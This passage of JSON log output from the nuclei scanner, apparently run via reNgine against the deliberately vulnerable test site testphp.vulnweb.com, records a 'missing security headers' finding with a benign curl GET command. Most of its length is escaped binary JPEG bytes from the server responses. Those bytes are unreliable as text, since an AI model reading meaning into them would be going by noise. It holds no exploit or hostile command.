\\u001c\\ufffd\\ufffdd2\\ufffd\\u0007\\ufffd\\ufffd\\ufffdŧY\\ufffda\\ufffd8\\ufffdt\\ufffd\\ufffdQ\\u0019db\\ufffd\\ufffd\\u0018\\ufffd\\ufffdI\\u0018\\ufffdrN1\\ufffd\\ufffdV8\\ufffd\\u0015\\ufffdQD\\ufffdJv\\ufffd\\ufffd\\ufffd\\u001fUI\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdD\\ufffdK[\\ufffdqf\\ufffd\\ufffd\\ufffd*\\ufffdm\\u0004\\ufffd\\u0019\\ufffd?8\\ufffd#=\\ufffdZ\\ufffd\\ufffd\\ufffd\\ufffd.\\ufffd\\ufffdI\\ufffdC\\ufffd\\ufffdb\\ufffd\\ufffd\\u001c[\\ufffd\\ufffd#ö\\u003cn\\u0008W\\ufffd\\u0005\\ufffd\\ufffd8 \\ufffd9\\ufffd\\ufffd6IP\\ufffd\\t\\ufffd\\ufffd\\ufffdyq\\u001c\\ufffd\\ufffd7PA\\ufffd\\ufffd=\\ufffd\\ufffd\\u0015\\ufffd0 1\\ufffd+s\\ufffd\\ufffd2\\u0006pO\\ufffd\\ufffd*\\ufffd9.\\ufffd\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd=R\\ufffdd\\u003c\\ufffd\\ufffd\\\\\\ufffd\\ufffd\\u001f\\ufffd\\ufffdl\\ufffd\\ufffd\\ufffd\\u000f\\ufffdț,\\u0008e\\u0000\\ufffdq\\ufffd8$v\\ufffd\\u003cg\\ufffd\\u0017\\ufffdy\\ufffd\\ufffd\\ufffdM\\ufffdҭ\\ufffd./\\ufffd`N@P\\u0019\\ufffd\\u0004\\ufffd\\u00120q\\ufffdۃ\\ufffdv\\u0016\\u001b\\ufffd\\\"\\ufffd\\ufffdŤv2q\\ufffd\\ufffd\\ufffdѩ\\ufffd\\ufffd\\u001eI(\\ufffd\\ufffdez\\u0017\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdF\\ufffd(\\ufffd\\ufffd$\\ufffd(?ju\\u0015\\ufffdۨ\\ufffd~iʠS\\ufffd\\ufffdȺ\\u0001 \\ufffdRJŁ\\u0026\\ufffd\\ufffdv\\ufffd\\ufffd\\ufffd\\u0005\\u0001:\\u000b\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003eU\\ufffd\\ufffd\\ufffdߐFA\\u001eA\\\"\\ufffd\\ufffdD\\ufffdV}C\\ufffd\\ufffd\\ufffd\\u0005\\u000c\\ufffd\\ufffd\\ufffdwo'\\ufffd\\ufffd\\u0019'i\\ufffdT\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001c\\ufffdCE֯\\ufffd[\\ufffdu\\ufffdʊ\\ufffd\\ufffd\\ufffdH\\ufffdш\\ufffdq\\ufffd\\u0016\\\\\\ufffd\\u001c3\\u000c\\ufffdj\\u001fX\\ufffd;|\\u003c,6p\\ufffd|\\ufffd\\ufffd\\ufffdON\\ufffd\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffdWf\\ufffdڰ.\\ufffdVu \\u0015\\ufffd\\u0006\\u0016@G\\ufffd9\\u003c\\u001e\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdGiz\\ufffdŔ:\\ufffd\\ufffdۥ\\ufffd\\ufffd\\ufffdT\\ufffd\\ufffdh\\ufffd\\ufffdz\\ufffd\\ufffd\\u0006=\\ufffdvFs\\ufffdr\\t\\ufffd4\\ufffds^\\ufffd7\\ufffd\\ufffdÝ\\ufffd\\u0011\\ufffdFW\\ufffd\\ufffd\\u003eT\\ufffd\\u000ct\\ufffdV$\\ufffd\\ufffdO\\ufffd[\\ufffd\\ufffd\\ufffd\\ufffd\\u0013\\u0008cc#M\\u0004\\ufffd\\u0019W\\ufffd\\ufffd\\ufffd\\ufffdGܮ\\u001c\\ufffd\\ufffd\\n~r(i\\ufffd\\ufffdjw\\u0006\\u0018Z\\u003c\\ufffd/\\ufffd\\ufffd\\ufffdF\\ufffd\\ufffdx\\u0007\\u0004\\ufffdb21\\ufffd\\ufffdm\\ufffdu\\ufffdXZ\\ufffd*\\ufffdFھ\\ufffd\\ufffd\\u0000ҰEM\\ufffd\\ufffd$*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffdD}\\ufffd\\ufffdRzE\\u0003\\ufffd\\ufffdH\\ufffd\\ufffd\\ufffda\\ufffd\\ufffd\\u001a\\ufffd{\\ufffd0\\ufffd\\ufffd\\ufffds\\ufffd\\ufffd\\ufffd\\ufffd2\\ufffd(\\ufffd\\ufffdך\\ufffd\\u00063ڢ\\ufffd\\ufffd\\ufffd\\ufffdF\\ufffd(\\ufffd\\ufffd\\\"\\ufffd(\\ufffd\\u0008\\ufffd\\ufffd(Bl\\ufffdmEE\\u0015Ġ\\ufffd\\u0006\\ufffd'=袄\\ufffd\\ufffd\\ufffd\\u000e\\ufffdw\\ufffdj\\ufffdwd\\ufffd:\\ufffdY\\u0018e%O(\\ufffdʜv\\ufffd\\u00020@5\\ufffd:\\ufffd6WWqDIX\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffdE\\u0015\\ufffdn\\ufffd\\u0007\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffdߴ\\ufffd+m6\\ufffd\\ufffde\\nč#;rX\\ufffd\\u001e\\ufffdI$\\ufffd\\ufffdw\\ufffd\\u0000\\u0006\\u0000\\ufffd\\\\0\\u0017\\ufffd7\\ufffd\\ufffdU\\u0003\\r\\u0018\\u000b\\ufffd\\ufffd\\u0011\\ufffd\\ufffd9\\u0018\\ufffd\\u0004w\\ufffd\\u003c`\\ufffd\\ufffdȾ$\\ufffd/\\ufffd\\ufffd\\ufffd\\ufffd*\\ufffdrțö\\u003e\\ufffdW\\ufffd\\ufffd\\u0013\\ufffdO.\\ufffd=\\ufffdП\\ufffd.\\ufffd\\u0004\\u0001\\ufffd\\ufffdc\\ufffdY!\\n\\ufffd\\ufffdWv\\ufffdv\\ufffd\\u0019e\\u0007\\ufffd\\u0015\\ufffd\\ufffdf\\ufffd\\ufffdӧ\\ufffd\\ufffdmn\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd8ݑ\\ufffd؁\\ufffd\\ufffd\\u003c`\\ufffd\\ufffd(\\ufffd:\\ufffd\\u0000\\ufffd\\u000f\\ufffdL\\ufffdOd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffdigw|\\ufffd\\ufffd)\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\u00078\\ufffd\\ufffd\\ufffd\\ufffd;\\ufffd98\\ufffd@\\ufffdE\\u0015\\u0017\\ufffd1\\ufffd\\ufffd\\ufffdE\\ufffd\\u001f`\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0002\\ufffd}\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:24.453626774Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36' 'http://testphp.vulnweb.com/pictures/3.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/7.jpg.tn\",\"path\":\"/pictures/7.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/7.jpg.tn\",\"request\":\"GET /pictures/7.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 6458\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:21 GMT\\r\\nEtag: \\\"4dca64a1-193a\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0005\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0006\\u0000\\u0002\\u0004\\u0005\\u0007\\u0003\\u0001\\u0008\\ufffd\\ufffd\\u00006\\u0010\\u0000\\u0002\\u0001\\u0003\\u0003\\u0003\\u0002\\u0004\\u0005\\u0002\\u0007\\u0000\\u0003\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0004\\u0005\\u0011\\u0000\\u0012!\\u0006\\u00131\\\"A\\u00072Qa\\u0014\\u0015#q\\ufffdB\\ufffd3CR\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0003\\u0000\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0005\\u0006\\u0001\\u0003\\u0007\\u0000\\u0002\\ufffd\\ufffd\\u00000\\u0011\\u0000\\u0001\\u0003\\u0003\\u0002\\u0004\\u0003\\u0008\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0000\\u0002\\u0003\\u0004\\u0005\\u0011!1\\u0012\\u0013AQaq\\ufffd\\u0006\\u0014\\\"2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0015B\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffdI\\ufffdKMc\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffdܡ\\ufffdy!\\ufffd2\\ufffd\\ufffdw\\u0005c\\ufffdϓϑ\\ufffd\\u0019\\ufffd|x\\ufffd\\u001bT]K=$4n\\ufffd2\\ufffd\\u0014ʌb\\ufffd\\ufffd\\u000c\\ufffd\\u0018,1φ\\ufffdG\\ufffdQz~\\ufffd\\ufffd=t\\ufffdW\\ufffd\\u0002\\u001aF*\\ufffdO0uw\\ufffdG\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd|\\ufffd\\ufffdq\\ufffd7\\u003c6nI\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\u0012)]%?\\ufffd\\ufffd@\\ufffd\\u000ez\\ufffdq\\ufffd\\ufffd\\ufffd\\u0014\\u0003\\ufffds\\ufffdj~\\ufffd\\ufffdE \\ufffd\\ufffd\\ufffd\\ufffdμ\\ufffd\\ufffd\\u0017\\ufffdRׄ\\ufffdH\\ufffd7Y_$\\ufffd5\\ufffd\\ufffdT\\ufffd\\ufffd\\u0018Bʤ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd}\\u001d\\ufffd\\u0026\\ufffd#R\\ufffd\\ufffd\\ufffdO\\ufffdd\\u003e\\ufffd\\ufffd y\\ufffd\\u001c\\ufffd\\ufffd\\u0007VR\\u001c\\ufffd\\u0001u\\ufffdv\\ufffd4*Q\\ufffd\\u0018\\ufffd\\ufffd \\ufffd\\ufffd\\ufffdަ\\u0003\\n\\u0014\\ufffd;\\ufffd\\ufffd\\ufffd\\u000c\\ufffdppt5\\\\\\ufffd\\ufffda\\ufffdl\\u0006\\ufffd\\ufffd:\\ufffdL\\ufffd\\ufffd\\u00059\\u0007$\\ufffd5ǧ\\ufffd3\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffdvb`\\ufffdJ\\ufffdd\\ufffd\\u000f\\ufffd\\ufffdjNﶃ:B\\ufffdu\\ufffd)\\ufffd2\\u001fS;\\ufffd\\u0014\\ufffd\\\"\\ufffdİ\\ufffd\\u0007r\\ufffd\\u0004\\u0000K1\\u0003h\\ufffd\\u0003:.W\\ufffd\\ufffdY\\ufffd\\ufffd\\ufffd;\\ufffdw\\nCI9\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\tϝ3w\\ufffdH\\ufffd\\ufffdD\\ufffdp\\ufffdf\\ufffdy\\ufffd\\u000b\\rp\\ufffd\\ufffd\\ufffd\\u00171\\ufffd~\\u000e7x϶uWCw\\ufffdD\\ufffd\\u000b\\ufffd\\u0012E@\\ufffd\\u000e\\ufffd\\u0018\\u0012FAR}\\ufffd\\ufffd\\ufffd\\u000f\\u0007\\u0004\\u00105:V\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffd\\ufffd\\ufffd0\\ufffdѐ7W\\u000c\\ufffd\\ufffd\\u0017n04\\ufffd o}r\\ufffdN\\u003e\\ufffd\\ufffd+\\rb\\ufffd':\\ufffd6Ll\\u0011\\ufffd\\ufffd8lx\\ufffdBt\\ufffd\\ufffd\\ufffdc+[\\ufffd\\ufffd\\ufffd\\ufffd\\u000fIt\\ufffdj\\ufffdY!\\ufffd\\ufffd!\\ufffd^\\ufffdqʑ\\ufffd,{\\ufffd疉q\\ufffd_\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdd\\u0014\\ufffd\\ufffdG$P\\ufffd\\ufffd\\n\\u000eԳ\\ufffd\\ufffd\\r\\ufffdR\\ufffd\\ufffd\\ufffd\\ufffd\\u003cg\\u001cx\\ufffd]\\ufffdH\\ufffd\\u001dT\\ufffdJ\\ufffdVشQ\\ufffd\\ufffdl\\ufffddd\\ufffd\\u0003$g*\\u0008\\u0004\\ufffd\\u0000\\ufffd:\\ufffdr\\ufffd\\u001bg\\ufffdM$\\ufffd\\u0004h\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffdKm\\u0018\\u0000珮F\\ufffdE\\u001bc\\ufffd\\ufffd\\ufffd\\ufffd\\u0018\\ufffd󟲧\\ufffdϚ\\ufffd\\u001b \\ufffdS\\ufffd\\u0000v\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000b\\ufffd\\u0012\\ufffd\\u0008c}\\ufffdPHq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdKQ\\u001cK\\ufffdWD\\\\\\ufffd\\ufffd8\\ufffd\\ufffd\\u000f\\ufffdӬ\\ufffd\\ufffdR\\ufffd\\ufffdi\\ufffd#U+:Y\\ufffdJJ\\ufffd\\ufffd\\ufffd2B\\ufffd\\ufffd\\u000cW \\ufffd\\ufffdA\\ufffd\\u0000q\\ufffd\\u0019\\ufffd\\u0000Ρy\\ufffdi\\ufffd\\ufffd;^\\u0013\\ufffd4\\ufffd8\\u001f}}a|\\u0012\\ufffd\\\\Zu\\ufffd\\ufffd\\ufffd\\u0015\\u001eP\\ufffd\\ufffd\\ufffd±\\ufffd\\u0004\\ufffd\\u0006\\ufffd//_\\u000c\\ufffdOC\\ufffd\\ufffd\\u0014KP\\ufffdXa/\\ufffdj\\ufffd!F\\u0007k8;\\ufffd@%x$`\\ufffdRx\\ufffd_U\\n\\ufffd\\ufffdb\\ufffd\\ufffdI\\u0005E\\u001c\\ufffd\\ufffd%1\\ufffd8\\ufffd;\\ufffd\\ufffd\\ufffd\\ufffd`\\ufffd\\ufffd\\ufffd\\ufffd\\u0007:Ww\\ufffd\\ufffdL\\ufffd\\ufffdrF\\ufffdP{;8\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu'\\ufffd\\ufffd\\ufffd\\\\::\\ufffdb\\u00163G\\ufffdB\\ufffd!;Ӎ\\ufffd\\u001caW\\ufffd\\ufffd\\ufffd\\ufffd\\u003c\\u000fa\\ufffd$\\ufffd`s\\ufffd\\ufffd\\ufffd+䦪Ji\\ufffd\\u0018\\u0012Aߌ+.\\u001d_\\ufffd\\ufffd\\u0005P\\ufffd\\ufffd]X\\u0001\\ufffd\\ufffd\\u00006\\ufffdZ\\ufffd8\\ufffd\\u001eK\\ufffd\\u0018D\\u0019c\\ufffd\\u0018\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdk\\ufffd\\ufffd[o4O\\u0015nk[\\ufffd\\ufffd\\ufffd\\ufffd}ƚ\\ufffd}\\ufffd7u\\ufffdĴ3H\\ufffd\\ufffdM\\ufffd7q\\u0026\\ufffd\\ufffd*\\ufffd\\ufffd\\ufffd\\ufffdN\\u0007\\ufffd\\ufffdp\\ufffdա\\ufffdw\\ufffdq\\ufffd\\ufffd\\ufffd~\\ufffd\\u0001\\ufffd~\\ufffd\\ufffd\\ufffd=\\ufffd\\ufffdE\\ufffd锳\\ufffd|\\ufffd\\ufffdLnp\\ufffd\\\\3$\\u000e\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\n\\ufffd\\ufffd;\\ufffdB\\ufffd\\ufffd\\ufffd\\ufffd(b\\ufffdG\\ufffd8c\\ufffd\\u0001vg,Ac\\ufffd\\u0013$\\ufffd\\u0005\\ufffd\\u0000J^\\ufffd^=\\ufffd\\ufffd\\ufffd\\ufffdϝ\\nu+\\ufffdQG:\\u0019B\\u000c\\u001c\\ufffd#\\ufffd\\ufffd΄\\ufffd`q\\u0012\\ufffd\\ufffdM\\ufffd\\u0013[[\\ufffdC\\ufffdx\\ufffd]\\ufffd\\ufffd\\u00158\\ufffd4F:s\\u0013\\\"\\ufffd\\ufffd\\ufffdRRT\\ufffdy \\ufffd\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffdR\\ufffd3\\ufffd\\ufffd\\u0002\\ufffd\\ufffdܮ}\\u0011=ʎ\\u0016\\ufffd\\ufffd\\ufffd(bhi`H\\ufffd\\u0000\\u0011\\u0000\\u0005\\\";\\u0011F\\ufffdI\\ufffd\\n\\ufffd?0b\\ufffd\\ufffd:z\\ufffd=L\\ufffd4ҁ\\ufffd\\u0008\\ufffd\\u0001G\\u0007\\ufffd\\u0000}\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\u0000\\ufffd\\u001c`t\\ufffd?\\ufffd8\\ufffdX\\u001bN\\ufffd$/\\ufffd[Vt\\ufffd\\u003c\\u001c\\ufffd\\ufffd\\ufffdimS\\ufffd@er\\ufffdC\\u000c\\u0011\\ufffd\\u000cu\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffdv\\ufffdC\\ufffd8\\ufffd \\ufffd8\\ufffd \\ufffd\\ufffdD\\ufffd\\ufffduC\\ufffdZ\\ufffdH\\ufffds\\t\\ufffd\\ufffdϾ|\\u0018\\ufffd\\u003eO\\ufffd\\u0008\\u001e\\ufffd\\ufffd\\ufffd \\ufffd\\ufffd\\u0016\\ufffd\\u001d\\u001c\\ufffd!\\ufffd\\u003e(*\\ufffdVl\\ufffdPϲX\\ufffdgqHӘ\\ufffd]\\ufffd\\ufffd\\t\\u000c\\ufffd\\ufffd6L\\u001cn8q.\\u0015A\\u0018!\\ufffd\\ufffd\\ufffd\\u00005\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\u0016\\u0013\\u0006\\u0014\\ufffd9`\\ufffd\\u0005\\u0008;9\\u0007$\\ufffd\\u0003\\ufffdhJ\\ufffd\\ufffdӳ\\ufffdI\\ufffdu=]\\u0015X\\u0002\\ufffd\\u000c\\ufffd\\u000b\\ufffd'\\ufffdT\\ufffd_\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\u0001l\\ufffd\\ufffd̴\\u00157\\u001b|\\ufffd!\\ufffdId\\ufffd\\u0015-\\u0018\\ufffd\\ufffdw+6_\\ufffd\\u000b\\u0000\\ufffd\\ufffd\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffdjJ:\\ufffd\\ufffdr\\ufffd,\\u000c\\ufffd\\ufffd\\ufffdL\\u001d\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd5\\u0015%W\\r\\ufffd\\u0013\\ufffd\\ufffdp5$\\ufffd\\u0016\\ufffdiHऎ\\u0018c\\u0011\\\"q\\ufffd\\u000c\\u0000s\\ufffd\\u0000~\\ufffd\\u001f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{\\ufffd(\\n1\\ufffd\\ufffd7\\u001c}\\ufffd\\ufffd\\u0000mH\\ufffdީ\\ufffd\\u000f\\ufffd2f\\ufffdi=\\ufffd\\ufffdL\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffda\\ufffd\\ufffd\\ufffd2F\\ufffd\\u000c$esɩ\\ufffdyt\\ufffd\\u0007\\ufffd\\ufffd\\ufffd\\ufffdw\\u001d7\\ufffd\\ufffd\\u0003g\\ufffd\\ufffd':ނ\\ufffdLs\\ufffdUq\\t#`@ \\ufffd}KsƸK\\ufffd5\\ufffdj\\u0016\\ufffd\\ufffdi\\ufffd@\\ufffd].\\u0004sȒƵ\\u0012\\u000c\\ufffd\\ufffd\\ufffd퐟\\ufffdp\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\ufffd\\ufffdd\\u0012\\u0015\\ufffd\\ufffd*\\ufffdt\\ufffdU\\ufffdLf\\ufffda\\u0006A\\u0002\\u0017S\\u001b\\ufffd;\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000c0q\\ufffd\\u0005\\u0000\\ufffdu\\ufffd\\ufffd\\ufffd_P6ᐰ#\\ufffd\\n\\ufffd\\ufffd\\u0011\\ufffd\\u0008\\ufffd\\ufffd\\u0013[)\\ufffdp\\ufffd\\ufffd\\ufffd\\ufffdKOz\\ufffd\\ufffdr\\ufffd\\ufffd\\u0006p\\ufffd$\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffd[y\\ufffd\\ufffdM;\\u001ao\\ufffd4\\ufffd\\ufffd\\ufffd!f, /\\ufffdع^\\u0010\\ufffd`\\ufffd\\u0005\\u0001ƢuM/P\\ufffd\\ufffd%\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd1H\\ufffd\\ufffd\\ufffde\\ufffd5\\ufffd\\ufffd\\u0026с\\ufffd(]\\ufffd\\ufffd!G\\u0003R:\\ufffd\\u0014J\\t\\ufffd\\ufffd4\\ufffd\\ufffde\\ufffdy\\ufffd\\ufffd\\ufffd%\\ufffd\\u000e\\ufffd\\ufffd\\ufffd|g\\u0019\\ufffd\\u0001$\\ufffd~f\\ufffd=Uj\\ufffdu\\u0015\\ufffdJj\\ufffd\\ufffdAQG:\\ufffd-c\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000eq\\ufffd\\ufffd#\\ufffd\\ufffdˑ\\ufffd\\ufffd\\ufffd\\ufffd~r0s\\ufffd\\ufffd˷n\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdl\\ufffds1\\ufffd\\ufffd\\ufffdGIw\\ufffd\\u0012CW\\u0004\\ufffd\\ufffd\\ufffdv\\ufffds\\ufffdG\\u001c\\u00022\\u000e\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdsQQ\\u000c\\ufffd\\ufffd\\u001dE-\\u003c2\\\"\\ufffd\\ufffd\\ufffd \\ufffdeV\\ufffd\\ufffdq\\ufffd\\ufffd9\\ufffd\\ufffdr\\u0018\\u0000\\ufffd\\ufffd\\ufffd\\ufffd0\\ufffdXk\\ufffd\\u0006\\ufffd\\ufffd\\ufffd\\ufffd\\u0014J\\ufffdu\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\n2\\ufffd\\u001d\\ufffd\\ufffd2.\\u0014r@\\u003cx\\ufffdk=MT߄\\u0012,P\\ufffd\\ufffd,-Q\\u001a\\ufffdr\\ufffd\\ufffd=L1\\ufffdp`s\\ufffd\\ufffd\\ufffdx\\ufffd=\\ufffdhk\\ufffd#9#ӧ\\ufffd\\n\\ufffdC\\ufffd'\\ufffdf\\ufffd\\u003e\\ufffdh\\ufffd\\ufffd%\\ufffd\\ufffd\\ufffd^mv\\ufffd\\ufffdK\\ufffd]R\\ufffd5=\\ufffd\\ufffd;\\u003e%œ\\ufffd8\\u001bO,7z\\ufffdg蹵%ud\\ufffd2=\\ufffdR:\\ufffdw\\ufffdD\\u0011\\ufffd\\u0013\\ufffd\\u0017n\\ufffd\\ufffd\\ufffd\\u00047\\u003c\\ufffd\\u000c\\ufffd\\u001b\\ufffdAƑ\\ufffd\\ufffdAq\\ufffd|=\\ufffd\\ufffd\\ufffd-p\\\\j\\u0016\\u0026\\ufffdU\\u0003d\\ufffd\\ufffd\\ufffd\\ufffdX\\ufffd0US\\u0019l`\\u0005*\\ufffd\\ufffdg\\u0015\\ufffd\\ufffd\\ufffdx\\ufffd\\ufffd!\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0014HY\\ufffd\\u0000\\ufffd\\ufffd9\\ufffd\\u000f\\ufffd\\ufffdog\\ufffdk\\ufffd6\\ufffd\\ufffd8;\\ufffd\\ufffd\\u0026\\ufffdVq\\ufffd#ܕ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdz\\ufffd\\ufffdT\\ufffd9q\\u0018\\nN\\ufffdp\\u0007\\ufffdQ\\ufffd\\ufffd-\\u0018\\ufffd\\ufffd\\u001aeK\\ufffdB\\u000f \\ufffd\\ufffd\\ufffd\\ufffd\\u0017d.*Ȱ\\ufffdU=\\ufffd\\ufffdM|\\ufffd\\ufffd\\ufffdi\\ufffdA\\u0026\\ufffd0ʮ\\ufffd\\ufffdA\\r\\ufffdO\\u003ex\\ufffd\\ufffd\\u000f \\ufffdr\\ufffd^\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffd\\ufffdi]c\\ufffd!M嘜\\u0001\\ufffd;\\ufffd \\u0000\\u0001\\ufffd\\u003c\\ufffd3_QJ\\ufffdj\\ufffd\\u0008\\u0012/y\\ufffdĀ(p\\ufffd,\\ufffdW\\u000cW!q\\ufffd\\u0004z\\ufffd\\ufffdȠ\\ufffd\\ufffde\\ufffd\\u0011\\ufffd_Qr\\ufffd\\ufffdĂ\\u001bz%E\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdGc\\ufffdS\\u0012\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffd)\\ufffd\\\"\\ufffd{\\twq\\ufffd\\ufffd\\ufffd㺴\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd̍ÇM5\\ufffd׺\\ufffd@\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffdm\\ufffd\\ufffd\\u0019dd\\ufffd\\ufffdd\\ufffd\\ufffd!]\\ufffd\\ufffd)\\ufffd\\ufffd%G\\u0000d\\ufffd\\u0017h݃\\ufffd\\ufffdwr\\ufffd\\ufffd\\ufffd{b\\ufffdjƪ\\tQOH#\\u0005\\ufffdy\\ufffd1\\ufffd\\ufffd\\ufffd7\\ufffdp\\u0014\\ufffd\\ufffd\\u0017\\u000crqik\\ufffdK=m\\u003c\\ufffdco\\ufffd\\ufffd\\ufffd\\ufffdr\\ufffd\\u0015\\ufffd\\ufffdͶH\\\"pCD\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\ufffd@*FA\\u0019:\\ufffdq\\ufffd\\ufffd\\u001c\\ufffd\\ufffdQx\\ufffd?\\ufffd\\ufffdJcV\\ufffd\\ufffd\\ufffd~\